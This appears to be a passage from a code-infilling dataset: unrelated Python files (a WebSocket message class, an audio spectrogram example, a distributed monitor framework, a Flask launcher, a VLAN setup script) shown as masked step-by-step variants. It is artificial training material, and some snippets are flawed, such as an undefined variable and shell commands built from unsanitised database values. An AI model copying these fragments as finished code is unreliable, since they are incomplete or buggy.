"step-3": "class WSCommand:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n\n def strData(self) ->str:\n return self.data\n\n def dictData(self) ->dict:\n return self.data\n",
"step-4": "class WSCommand:\n handshake_hi = 'handshake_hi'\n ping = 'ping'\n pong = 'pong'\n http_call = 'http_call'\n http_return = 'http_return'\n\n\nclass WSMessage:\n\n def __init__(self, command: str, data: any=None) ->None:\n self.command = command\n self.data = data\n\n def strData(self) ->str:\n return self.data\n\n def dictData(self) ->dict:\n return self.data\n",
"step-5": null,
"step-ids": [
3,
4,
5,
6
]
}
|
[
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
if __name__ == '__main__':
[Fs, s] = wavfile.read('../data/sample_music.wav')
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=
'temp.html', auto_open=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
layout = go.Layout(title=
'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(
title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
if __name__ == '__main__':
[Fs, s] = wavfile.read('../data/sample_music.wav')
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=
'temp.html', auto_open=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
import scipy.io.wavfile as wavfile
import plotly
import plotly.graph_objs as go
from pyAudioAnalysis import ShortTermFeatures as aF
layout = go.Layout(title=
'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(
title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / 2.0 ** 15
signal = signal - signal.mean()
return signal / (np.abs(signal).max() + 1e-10)
if __name__ == '__main__':
[Fs, s] = wavfile.read('../data/sample_music.wav')
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=
'temp.html', auto_open=True)
<|reserved_special_token_1|>
"""!
@brief Example 04
@details pyAudioAnalysis spectrogram calculation and visualization example
@author Theodoros Giannakopoulos {tyiannak@gmail.com}
"""
import numpy as np
import scipy.io.wavfile as wavfile
import plotly
import plotly.graph_objs as go
from pyAudioAnalysis import ShortTermFeatures as aF
layout = go.Layout(title='Spectrogram Extraction Example using pyAudioAnalysis',
xaxis=dict(title='time (sec)',),
yaxis=dict(title='Freqs (Hz)',))
def normalize_signal(signal):
signal = np.double(signal)
signal = signal / (2.0 ** 15)
signal = (signal - signal.mean())
return signal / ((np.abs(signal)).max() + 0.0000000001)
if __name__ == '__main__':
[Fs, s] = wavfile.read("../data/sample_music.wav")
s = normalize_signal(s)
[S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.020), int(Fs * 0.020))
heatmap = go.Heatmap(z=S.T, y=f, x=t)
plotly.offline.plot(go.Figure(data=[heatmap], layout=layout),
filename="temp.html", auto_open=True)
|
flexible
|
{
"blob_id": "cb40141eddce9ce11fbd8475fc7c3d37438208a6",
"index": 6862,
"step-1": "<mask token>\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read('../data/sample_music.wav')\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=\n 'temp.html', auto_open=True)\n",
"step-3": "<mask token>\nlayout = go.Layout(title=\n 'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(\n title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read('../data/sample_music.wav')\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=\n 'temp.html', auto_open=True)\n",
"step-4": "<mask token>\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nimport plotly\nimport plotly.graph_objs as go\nfrom pyAudioAnalysis import ShortTermFeatures as aF\nlayout = go.Layout(title=\n 'Spectrogram Extraction Example using pyAudioAnalysis', xaxis=dict(\n title='time (sec)'), yaxis=dict(title='Freqs (Hz)'))\n\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / 2.0 ** 15\n signal = signal - signal.mean()\n return signal / (np.abs(signal).max() + 1e-10)\n\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read('../data/sample_music.wav')\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.02), int(Fs * 0.02))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout), filename=\n 'temp.html', auto_open=True)\n",
"step-5": "\"\"\"! \n@brief Example 04\n@details pyAudioAnalysis spectrogram calculation and visualization example\n@author Theodoros Giannakopoulos {tyiannak@gmail.com}\n\"\"\"\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nimport plotly\nimport plotly.graph_objs as go\nfrom pyAudioAnalysis import ShortTermFeatures as aF\nlayout = go.Layout(title='Spectrogram Extraction Example using pyAudioAnalysis',\n xaxis=dict(title='time (sec)',),\n yaxis=dict(title='Freqs (Hz)',))\n\ndef normalize_signal(signal):\n signal = np.double(signal)\n signal = signal / (2.0 ** 15)\n signal = (signal - signal.mean())\n return signal / ((np.abs(signal)).max() + 0.0000000001)\n\nif __name__ == '__main__':\n [Fs, s] = wavfile.read(\"../data/sample_music.wav\")\n s = normalize_signal(s)\n [S, t, f] = aF.spectrogram(s, Fs, int(Fs * 0.020), int(Fs * 0.020))\n heatmap = go.Heatmap(z=S.T, y=f, x=t)\n plotly.offline.plot(go.Figure(data=[heatmap], layout=layout),\n filename=\"temp.html\", auto_open=True)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import functools
import inspect
import threading

from monitor.mutex import Mutex, mutex_hooks
from monitor.condition import Condition, condition_hooks
from monitor.shared_variables import SharedList, SharedDict, shared_auto, \
    variable_hooks
# Merge the per-module hook registries into one lookup table
# (later registries win on key collision, as with dict.update).
hooks = {**mutex_hooks, **condition_hooks, **variable_hooks}
def method_decorator(method):
    """Wrap *method* so it executes inside the monitor's critical section.

    On entry the monitor mutex is acquired and pending remote changes are
    applied to every registered shared variable; on successful exit the
    local changes are published via ``sync``. The mutex is released in all
    cases.
    """
    @functools.wraps(method)
    def wrapped(self, *args, **kwargs):
        self._mutex.acquire()
        try:
            # Pull in writes made by other processes before the body runs.
            for var in self._variables:
                var.apply_pending_changes()
            value = method(self, *args, **kwargs)
            # Publish this process's writes before leaving the monitor.
            for var in self._variables:
                var.sync()
            return value
        finally:
            # Fix: release even when the body raises — the original left
            # the mutex held on an exception, deadlocking the monitor.
            self._mutex.release()
    return wrapped
class MonitorMeta(type):
    """Metaclass that routes every user-defined method of a monitor class
    through ``method_decorator`` so it runs inside the monitor's mutex.

    The infrastructure methods supplied by the base class (and the
    constructors) are deliberately left unwrapped.
    """

    def __init__(cls, clsname, bases, attrs):
        super().__init__(clsname, bases, attrs)
        passthrough = ('wait', 'signal', 'register', 'shared',
                       'condition', '__init__', '__new__')
        for attr_name, func in inspect.getmembers(
                cls, predicate=inspect.isfunction):
            if attr_name in passthrough:
                continue
            setattr(cls, attr_name, method_decorator(func))
class ConditionWrapper:
def __init__(self, condition, monitor):
self.condition = condition
self.monitor = monitor
def wait(self):
for var in self.monitor._variables:
var.sync()
self.condition.wait()
for var in self.monitor._variables:
var.apply_pending_changes()
def signal(self):
self.condition.signal()
class MonitorBase(object, metaclass=MonitorMeta):
_monitor_counter = 0
_variable_counter = 0
_condition_counter = 0
def __new__(cls, *args, **kwargs):
obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)
cls._monitor_counter += 1
mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)
obj._mutex = Mutex(mutex_name)
obj._variables = []
return obj
def wait(self, condition):
condition.wait()
def signal(self, condition):
condition.signal()
def register(self, variables):
self._variables.extend(variables)
def shared(self, data):
self.__class__._variable_counter += 1
name = 'variable-{}-{}'.format(self.__class__.__name__, self.__class__._variable_counter)
var = shared_auto(name, data)
self._variables.append(var)
return var
def condition(self):
self.__class__._condition_counter += 1
name = 'condition-{}-{}'.format(self.__class__.__name__, self.__class__._condition_counter)
c = ConditionWrapper(Condition(self._mutex, name), self)
return c
class Monitor(MonitorBase):
def __init__(self):
# self.s1 = SharedList('s1', [1,2,3])
# self.register([self.s1])
self.s1 = self.shared([1,2,3])
self.c = self.condition()
def test(self):
self.wait("aaa")
print("test")
self.signal("aaa")
return 1
def abc(self):
print("abc")
return 2
def seq(self):
for i in range(10):
print(rank, i)
def list_append(self, elem):
self.s1.append(elem)
def list_print(self):
print(self.s1)
if __name__ == '__main__':
import time
from monitor.main import event_loop, send_exit
m = Monitor()
event_loop_thread = threading.Thread(target=event_loop, args=(hooks,))
event_loop_thread.start()
# print(m._mutex)
# while True:
# m.seq()
m.list_append(5)
time.sleep(1)
m.list_print()
send_exit()
event_loop_thread.join()
|
normal
|
{
"blob_id": "80d49b24a2233569a340cee918393b1663c3d55d",
"index": 4598,
"step-1": "<mask token>\n\n\nclass ConditionWrapper:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ConditionWrapper:\n\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n <mask token>\n <mask token>\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ConditionWrapper:\n\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n <mask token>\n\n def signal(self):\n self.condition.signal()\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\n<mask token>\n",
"step-4": "<mask token>\nfor h in [mutex_hooks, condition_hooks, variable_hooks]:\n hooks.update(h)\n\n\ndef method_decorator(method):\n\n def wrapped(self, *args, **kwargs):\n self._mutex.acquire()\n for var in self._variables:\n var.apply_pending_changes()\n value = method(self, *args, **kwargs)\n for var in self._variables:\n var.sync()\n self._mutex.release()\n return value\n return wrapped\n\n\nclass MonitorMeta(type):\n\n def __init__(cls, name, bases, attrs):\n super(MonitorMeta, cls).__init__(name, bases, attrs)\n for name, method in inspect.getmembers(cls, predicate=inspect.\n isfunction):\n if name not in ['wait', 'signal', 'register', 'shared',\n 'condition', '__init__', '__new__']:\n setattr(cls, name, method_decorator(method))\n\n\nclass ConditionWrapper:\n\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n\n def wait(self):\n for var in self.monitor._variables:\n var.sync()\n self.condition.wait()\n for var in self.monitor._variables:\n var.apply_pending_changes()\n\n def signal(self):\n self.condition.signal()\n\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 'variable-{}-{}'.format(self.__class__.__name__, self.\n __class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 
'condition-{}-{}'.format(self.__class__.__name__, self.\n __class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\n\nclass Monitor(MonitorBase):\n\n def __init__(self):\n self.s1 = self.shared([1, 2, 3])\n self.c = self.condition()\n\n def test(self):\n self.wait('aaa')\n print('test')\n self.signal('aaa')\n return 1\n\n def abc(self):\n print('abc')\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\n\nif __name__ == '__main__':\n import time\n from monitor.main import event_loop, send_exit\n m = Monitor()\n event_loop_thread = threading.Thread(target=event_loop, args=(hooks,))\n event_loop_thread.start()\n m.list_append(5)\n time.sleep(1)\n m.list_print()\n send_exit()\n event_loop_thread.join()\n",
"step-5": "import inspect\nimport threading\n\nfrom monitor.mutex import Mutex, mutex_hooks\nfrom monitor.condition import Condition, condition_hooks\nfrom monitor.shared_variables import SharedList, SharedDict, shared_auto, \\\n variable_hooks\n\nhooks = {}\nfor h in [mutex_hooks, condition_hooks, variable_hooks]:\n hooks.update(h)\n\ndef method_decorator(method):\n def wrapped(self, *args, **kwargs):\n # print(self, *args, **kwargs)\n self._mutex.acquire()\n for var in self._variables:\n var.apply_pending_changes()\n value = method(self, *args, **kwargs)\n for var in self._variables:\n var.sync()\n self._mutex.release()\n return value\n return wrapped\n\nclass MonitorMeta(type):\n def __init__(cls, name, bases, attrs):\n super(MonitorMeta, cls).__init__(name, bases, attrs)\n for name, method in inspect.getmembers(cls, predicate=inspect.isfunction):\n if name not in ['wait', 'signal', 'register', 'shared',\n 'condition', '__init__', '__new__']:\n setattr(cls, name, method_decorator(method))\n\nclass ConditionWrapper:\n def __init__(self, condition, monitor):\n self.condition = condition\n self.monitor = monitor\n\n def wait(self):\n for var in self.monitor._variables:\n var.sync()\n self.condition.wait()\n for var in self.monitor._variables:\n var.apply_pending_changes()\n\n def signal(self):\n self.condition.signal()\n\nclass MonitorBase(object, metaclass=MonitorMeta):\n _monitor_counter = 0\n _variable_counter = 0\n _condition_counter = 0\n def __new__(cls, *args, **kwargs):\n obj = super(MonitorBase, cls).__new__(cls, *args, **kwargs)\n cls._monitor_counter += 1\n mutex_name = 'mutex-{}-{}'.format(cls.__name__, cls._monitor_counter)\n obj._mutex = Mutex(mutex_name)\n obj._variables = []\n return obj\n\n def wait(self, condition):\n condition.wait()\n\n def signal(self, condition):\n condition.signal()\n\n def register(self, variables):\n self._variables.extend(variables)\n\n def shared(self, data):\n self.__class__._variable_counter += 1\n name = 
'variable-{}-{}'.format(self.__class__.__name__, self.__class__._variable_counter)\n var = shared_auto(name, data)\n self._variables.append(var)\n return var\n\n def condition(self):\n self.__class__._condition_counter += 1\n name = 'condition-{}-{}'.format(self.__class__.__name__, self.__class__._condition_counter)\n c = ConditionWrapper(Condition(self._mutex, name), self)\n return c\n\nclass Monitor(MonitorBase):\n def __init__(self):\n # self.s1 = SharedList('s1', [1,2,3])\n # self.register([self.s1])\n self.s1 = self.shared([1,2,3])\n self.c = self.condition()\n\n def test(self):\n self.wait(\"aaa\")\n print(\"test\")\n self.signal(\"aaa\")\n return 1\n\n def abc(self):\n print(\"abc\")\n return 2\n\n def seq(self):\n for i in range(10):\n print(rank, i)\n\n def list_append(self, elem):\n self.s1.append(elem)\n\n def list_print(self):\n print(self.s1)\n\nif __name__ == '__main__':\n import time\n\n from monitor.main import event_loop, send_exit\n\n m = Monitor()\n\n event_loop_thread = threading.Thread(target=event_loop, args=(hooks,))\n event_loop_thread.start()\n\n # print(m._mutex)\n # while True:\n # m.seq()\n m.list_append(5)\n time.sleep(1)\n m.list_print()\n\n send_exit()\n event_loop_thread.join()\n",
"step-ids": [
16,
17,
18,
23,
26
]
}
|
[
16,
17,
18,
23,
26
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
app.run(host='0.0.0.0', port=5001)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
app.run(host='0.0.0.0', port=5001)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from app.api import app
def main():
app.run(host='0.0.0.0', port=5001)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "b49e5b40ce1e16f1b7c0bd9509daf94f36c51256",
"index": 6726,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n app.run(host='0.0.0.0', port=5001)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n app.run(host='0.0.0.0', port=5001)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from app.api import app\n\n\ndef main():\n app.run(host='0.0.0.0', port=5001)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
<|reserved_special_token_0|>
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
def getSysInterface():
info = os.popen('ifconfig').read()
f = open('ifconfig_info.txt', 'w')
print >> f, info
f.close()
match = re.compile('(.+?)\\s*?Link')
f = open('ifconfig_info.txt', 'r')
interface = []
for line in f:
if 'Link encap' in line:
info = match.match(line).groups()
interface.append(info)
f.close()
b = []
for i in range(len(interface)):
a = list(tuple(interface[i]))
a = ''.join(a)
b.append(a)
strinfo = ' '.join(b)
listinfo = strinfo.split()
port = []
nic = []
for i in range(len(listinfo)):
if '.' in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port = []
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
def getSysInterface():
info = os.popen('ifconfig').read()
f = open('ifconfig_info.txt', 'w')
print >> f, info
f.close()
match = re.compile('(.+?)\\s*?Link')
f = open('ifconfig_info.txt', 'r')
interface = []
for line in f:
if 'Link encap' in line:
info = match.match(line).groups()
interface.append(info)
f.close()
b = []
for i in range(len(interface)):
a = list(tuple(interface[i]))
a = ''.join(a)
b.append(a)
strinfo = ' '.join(b)
listinfo = strinfo.split()
port = []
nic = []
for i in range(len(listinfo)):
if '.' in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port = []
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
if __name__ == '__main__':
VlanConfig()
<|reserved_special_token_1|>
import MySQLdb
import os
import commands
from common import logger_init
from logging import getLogger
import re
from db import VlanInfo, Session, WafBridge
def getVlan():
session = Session()
vlanport = []
for info in session.query(VlanInfo):
a = []
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface = []
for i in range(len(vlanport)):
nic = vlanport[i]
a = nic[0].split(',')
interface.append(a[0] + '.' + nic[1])
interface.append(a[1] + '.' + nic[1])
return interface
def getBridgeInfo():
session = Session()
brgport = []
for info in session.query(WafBridge.nics):
info = list(tuple(info))
info = ''.join(info)
brgport.append(info)
brgport = ' '.join(brgport)
return brgport
def getSysInterface():
info = os.popen('ifconfig').read()
f = open('ifconfig_info.txt', 'w')
print >> f, info
f.close()
match = re.compile('(.+?)\\s*?Link')
f = open('ifconfig_info.txt', 'r')
interface = []
for line in f:
if 'Link encap' in line:
info = match.match(line).groups()
interface.append(info)
f.close()
b = []
for i in range(len(interface)):
a = list(tuple(interface[i]))
a = ''.join(a)
b.append(a)
strinfo = ' '.join(b)
listinfo = strinfo.split()
port = []
nic = []
for i in range(len(listinfo)):
if '.' in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port = []
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig():
logger_init('main', 'log/vlanconfig.log', 'INFO')
config_interface = getVlan()
configured_port = getSysInterface()
vlan_port = ' '.join(configured_port[0])
configured_nic = ' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a = config_interface[i].split('.')
if a[0] not in configured_nic:
status, output = commands.getstatusoutput('ifconfig %s up' %
a[0])
if status != 0:
return
status, output = commands.getstatusoutput('vconfig add %s %s' %
(a[0], a[1]))
getLogger('main').info(output)
